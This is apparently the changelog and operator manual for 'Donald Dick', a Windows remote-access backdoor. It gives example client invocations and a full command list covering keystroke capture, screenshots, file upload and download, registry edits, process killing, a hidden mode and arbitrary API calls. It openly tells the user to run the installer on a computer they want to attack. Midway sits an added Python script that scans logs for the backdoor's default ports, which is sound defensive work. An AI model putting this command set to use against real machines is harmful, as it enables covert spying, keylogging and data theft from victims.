version 1.54: recent changes from 1.53a4:
new commands:
ATTRIB
FEEDBACK
SYSLOG
- we're no longer using predefined filenames
- dd system log can be emailed when server is up or crashed
- initial configuration is possible; just write the required parameters in the ini file and run ddsetup.exe
- nethood bugfix
- password fix: now the same password must be specified in GUI and command
line clients; in options: password may be any length
- options may contain quoted substrings
- file attributes are preserved in uploads/downloads
note: in this version, the jpeg compressor (jpegcomp.dll) is not installed automatically; if you need this functionality, you should upload it to the destination host.
version 1.53a4: recent changes from 1.53a3 version:
new commands:
SHEXEC
NETHOOD
- NT: exe transformation fixed
- DIR command: file mask may be disabled for directories
version 1.53a3: recent changes from 1.53a2:
bugfix: high 2 bytes of spx network number were lost,
now network number is hex by default
Preliminary SmartMorph is used for executables (loaders are still defenceless)
Run ddsetup.exe, it will generate Donald Dick unique installable
file ddick.exe; run ddick.exe (you may rename it) on a computer you
want to f@#k and have fun.
version 1.53a2: recent changes from 1.53a1 version:
commands that expect file names and paths now accept the following constants (anywhere in the string):
::SYSDIR - windows system directory
::WINDIR - windows directory
::TMPDIR - temporary directory
::PRGDIR - program files directory
note that these directories also include the drive letter
version 1.53a1: recent changes from 1.53a version:
new commands:
REGVAL1
FREAD
FWRITE
Command line parameters:
[...]
where
: 0 - SPX, 1 - TCP
: target address; TCP example: 127.0.0.1; SPX example: 22FA6700B
: port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
: d=N, where N is the delay before execution, in ms
D=N, where N is the delay after execution, in ms (has no meaning if the repeat count is unspecified or 1)
r=N, where N is the repeat count (the result is sent back for the last executed command only)
p=X, where X is the password
: see below
...: parameters if required
examples:
get info (no password is required):
client.exe 0 220482120A8 0 "" 0 info
client.exe 1 212.20.33.8 "" 0 info
upload file (no password is required):
client.exe 1 212.20.33.8 "" 0 upload "c:\program files\e.exe" e.exe
set binary value in the registry (no password is required):
client.exe 0 220482120A8 0 "" 0 setregbin hklm\system\aaa test F01456
set system colors (no password is required):
client.exe 0 220482120A8 0 "" 0 setcolors "2 3" "255 0 0 128 128 0"
open CDROM tray 10 times (assuming the user closes it each time), delay before execution 20 s, delay after execution 120 s, no password is required:
client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd
the client waits for the reply to the last command; since that takes a long time you may Ctrl-Break it, and the request will be executed anyway
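As an added defender-side example (not part of the original Donald Dick notes), the following Python script scans firewall or flow log lines for connections to the default listener ports stated above (TCP 23476, SPX socket 0x9014). The log format and the sample lines are constructed for this example; adapt the regex to your own export. Because the PORT command can move the listener elsewhere, a hit is a lead to confirm on the host, and an empty result does not rule the backdoor out.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Default listener ports from the 1.53a1 command line notes:
# TCP 23476 and SPX socket 0x9014 (36884 decimal). An operator can
# change them with the PORT command, so this is a baseline check only.
WATCHED_PORTS = {("TCP", 23476), ("SPX", 0x9014)}


@dataclass(frozen=True)
class Flow:
    timestamp: str
    proto: str
    src: str
    dst: str
    dport: int
    action: str


# Assumed (constructed) log format:
#   <timestamp> <proto> <src>:<sport> -> <dst>:<dport> <action>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>\S+)\s+(?P<src>\S+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\S+):(?P<dport>\d+)\s+(?P<action>\S+)$"
)


def parse_line(line):
    """Parse one log line into a Flow, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["proto"].upper(), m["src"], m["dst"],
                int(m["dport"]), m["action"])


def find_suspect_flows(log_text):
    """Return every flow whose (protocol, destination port) is a watched pair.
    Denied flows are kept too: a blocked attempt still shows which host
    is trying to reach the port."""
    hits = []
    for line in log_text.splitlines():
        flow = parse_line(line)
        if flow is not None and (flow.proto, flow.dport) in WATCHED_PORTS:
            hits.append(flow)
    return hits


def hosts_by_hits(flows):
    """Count suspect flows per destination host to prioritise triage."""
    return dict(Counter(f.dst for f in flows))


# Constructed sample log; the SPX addresses reuse the page's example values.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z TCP 10.0.0.5:51234 -> 10.0.0.20:443 ALLOW
2024-05-01T10:00:02Z TCP 10.0.0.7:51235 -> 10.0.0.21:23476 ALLOW
2024-05-01T10:00:03Z UDP 10.0.0.7:51236 -> 10.0.0.1:53 ALLOW
2024-05-01T10:00:04Z TCP 10.0.0.9:51237 -> 10.0.0.21:23476 DENY
2024-05-01T10:00:05Z SPX 220482120A8:4000 -> 22FA6700B:36884 ALLOW
this line is not in the expected format and is skipped
"""

if __name__ == "__main__":
    hits = find_suspect_flows(SAMPLE_LOG)
    for f in hits:
        print(f"{f.timestamp} {f.proto} {f.src} -> {f.dst}:{f.dport} {f.action}")
    print("hosts to triage:", hosts_by_hits(hits))
```

Run it as-is to see the three flagged flows; in practice, feed it the exported log text and follow up on each destination host with a process and listening-port review, since the page notes that the server can also change its own port via PORT.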
Commands:
Server:
ECHO, FEEDBACK, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS, SYSLOG,
TERMINATE, TESTFAR, TESTNEAR, UNINSTALL, UPGRADE
Chat:
CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV
File system:
ATTRIB, CREATEDIR, DIR, DOWNLOAD, ERASE, FREAD, FWRITE, GETDRIVES, RCOPY,
REMOVEDIR, RENAME, SETFTEQ, SETFTIME, UPLOAD
Processes:
FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST, KILL,
KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS, SHEXEC, SUSPEND
Registry:
REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN,
REGSETDWORD, REGSETSZ, REGVAL, REGVAL1, REGSETVAL
System:
ANYCALL, GETTIME, LOGOFF, NETHOOD, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
SHUTDOWN, SPI, SYSINFO
Keyboard:
KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE
Windows:
CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, MSGBOX, SCREENSHOT,
SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT
Hardware:
RDCMOS, WRCMOS
Jokes:
CLOSECD, MONOFF, MONON, OPENCD, PLAY
All:
ANYCALL
[ [...]]
-- not tested yet --
Call any function - very cool but dangerous.
Params may be immediate data (numbers or arrays) or may start with 'p'; in that case they are data and/or buffers that the param points to.
If a param contains only 'p' then the pointer is NULL.
The API function is called inside the thread which processes the request.
Flags:
bit 0,1:  0 - use LoadLibrary( module name ), GetProcAddress( function name )
              and perform a near call,
          1 - use offset (selector may be any value) and perform a near call,
          2 - use selector and offset and perform a far call.
bit 2:    params push order, 0 - right->left (C), 1 - left->right (PASCAL);
          if bits 4,5 are not zero then this bit is ignored.
bit 3:    who removes params from the stack, 0 - caller, 1 - callee.
bit 4,5:  register optimization (first params are passed in a register set):
          0 - none,
          n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
          n/i 2 - Delphi, the set is EAX, EDX, ECX.
bit 6:    how to pass the return value buffer's address for arrays:
          0 - Watcom C - address is passed in ESI
          1 - Delphi, when register optimization is used - address is passed
              in the last register in the set if the parameter count is less
              than 3, or in the first position on the stack; if no
              optimization is set in bits 4,5 then the address is passed in
              the first position on the stack
bit 8-31: buffer size to allocate on the stack for the return value;
          if zero then the return value is expected in EDX:EAX and bit 6
          is ignored.
ATTRIB
CHATCLR [] Clears chat room; if the non-volatile
flag is nonzero then the non-volatile
chat room is cleared
CHATRD [] Reads messages from the chat room
starting with index, or all of them
if index is 0 or absent;
message format:
the index of a message is incremented
continuously since the first message
in the chat room, even if the room
was cleared
CHATRDNV [] same as CHATRD but operates with
non-volatile room
CHATSIZE [] Get/set chat room size, default
size is 8K; chat room is cleared
CHATWR [...] Add message(s) to the chat room
CHATWRNV [...] same as CHATWR but operates with
non-volatile room; non-volatile
chat room is limited to 2K
CHILDWINDOWS Get child windows of window
CLOSECD
CREATEDIR [...]
Note: returns as many result
strings as parameters passed.
DIR Don't forget file mask!
DOWNLOAD
ECHO Server sends received packet back
ERASE <> [...<>]
force flag: /0 or /1; /1 erases the
file even if it is read-only, or a directory
with all its files and subdirectories.
Note: returns as many strings as
parameters passed.
FEEDBACK [ [ [ [ []]]]]
Set feedback parameters;
current parameters are always
returned
FORGETALL Clears suspended thread table
FREAD Reads data from file
FWRITE Writes data to file
GETCOLORS Get system colors
GETDRIVES Get list of drives
GETPCLASS Get priority class
GETPID Get server's process id
GETPROCLIST Get list of processes
GETSUSPTHR Get list of suspended threads in
the form:
GETTHRLIST Get list of threads for specified
process
GETTIME Returns date and time
GETWINDOW Returns window handle(s) relative
to the given window (see Win32 API
documentation on GetWindow()
for description)
HIDDEN <0/1> hidden mode on/off;
in hidden mode the server does not
reply to any command if an error
occurred before its processing
(reception, password verification,
function code verification).
Returns current mode
HWNDDESKTOP Returns desktop window handle
INFO Returns some info
KEYBSAVE [<0/1>] not implemented; without a parameter, or if
it is nonzero, saves the current lookup
table; if the parameter is zero,
clears the saved table
KEYBUF [ []] Returns captured scan codes;
if parameter is
absent then returns last keystrokes;
only the following scan codes are
captured: 02..1C, 1E..29, 2B..35,
37, 39, 47..53 and 9C, B5 - these
codes denote extended keys with
secondary scan codes 1C and 35
KEYMAP [ Remaps keys and returns the current map;
...] this command sets elements in the
lookup table;
lookup table contains 256 scan codes in
range 0..127; first half of table is
used to remap regular keys, second one
is used to remap extended keys (those
keys produce two-byte scan codes, first
code is E0); normally,
elements at indexes 0 and 128 have
code 0, at 1 and 129 - 1 and so on;
key is disabled if code is 0;
note that it is impossible to remap
pause/break key
KEYSTROKE [...] simulates keystrokes
KILL [...]
Note: returns as many result
strings as parameters passed.
KILLBYNAME [...]
Note: returns as many result
strings as parameters passed.
KILLTHR [...]
Kills thread(s) (under Win95 may
not be done immediately)
Note: returns as many result
strings as thread ids passed.
LOGOFF Performs logoff for workstation
MONOFF Turns monitor off
MONON Turns monitor on
MSGBOX
Displays message box, see below
for the description of
NETHOOD network neighbourhood
OPENCD
PLAY
PORT GET/[...] Get or set port numbers in registry,
server must be restarted to
apply changes; protocol name
may be SPX or TCP; is
a number or D (default port)
always returns port numbers
POWEROFF Performs power off
RCOPY [...]
Note: returns result string for
each parameter pair.
RDCMOS Reads CMOS data, start - index in range 0..255
RAISE Raises an exception - for debug purposes only
REBOOT
REGDELK Deletes subkey from the registry
REGDELV Deletes value from subkey
REGISTER [] Registers server
Returns status in the first line,
registration info in the second line,
registration status in the third line
if registration data is present
REGKEY Displays subkeys in key
REGNEWK Creates new subkey
REGSETBIN Sets binary value, value
is the sequence of hex digits
without any spaces
REGSETDWORD Sets DWORD value
REGSETSZ Sets string value
REGSETVAL
Sets value of any type. Value
is the sequence of hex digits
without any spaces
REGVAL Key must contain "hklm","hkus",
"hkcu","hkcr" first
REGVAL1 Key must contain "hklm","hkus",
"hkcu","hkcr" first
REMOVEDIR [...]
Note: returns as many result
strings as parameters passed.
RENAME [...]
Note: returns result string for
each parameter pair.
RESUME [...]
Resumes thread(s)
Note: returns as many result
strings as thread ids passed.
RESUMEALL Resumes all suspended threads
RUN [...]
Note: returns as many result
strings as parameters passed.
SCREENSHOT [ [ [...]]]
SETCAPTION
SETCOLORS
SETCOMPNAME
SETFTEQU Sets date/time of file
equal to reference file
SETFTIME
SETPASS [] Sets or removes password
SETPCLASS Set priority class
SETTIME
SHEXEC
calls ShellExecuteEx
Flags allowed: SEE_MASK_CONNECTNETDRV,
SEE_MASK_DOENVSUBST,
SEE_MASK_FLAG_NO_UI
SHUTDOWN
SPI [] Get/set system parameters info
SUSPEND [...]
Suspends thread(s) (under Win95
may not be done immediately;
suspension means entering a
continuous loop, so the thread
consumes cpu power)
Note: returns as many result
strings as thread ids passed.
SYSINFO
SYSLOG [] Reads messages from the dd system log
starting with index, or all of them
if index is 0 or absent;
message format:
the index of a message is incremented
continuously
TERMINATE Server terminates itself
TESTFAR Returns far address of far test function - debug only
TESTNEAR Returns near address of near test function - debug only
UNINSTALL Completely uninstalls donald dick server
UPLOAD
UPGRADE restarts server anyway
WINDOWS Get window list
WINMSG
params may be numbers or may
start with 'p'; in that case
they are data and/or buffers
that lparam and/or wparam
point to
WINSHOT [ [ [...]]]
screenshot for the specified
window or for the foreground
window if handle is 0
WRCMOS